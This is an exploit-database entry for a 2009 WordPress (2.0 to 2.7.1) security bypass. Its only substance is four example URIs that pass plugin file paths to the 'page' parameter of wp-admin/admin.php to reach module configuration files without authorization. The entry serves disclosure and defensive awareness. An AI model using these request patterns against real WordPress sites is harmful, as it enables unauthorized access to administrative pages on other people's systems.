WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass

EDB-ID:

10088

CVE:

N/A


Platform:

PHP

Published:

2009-11-10

An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php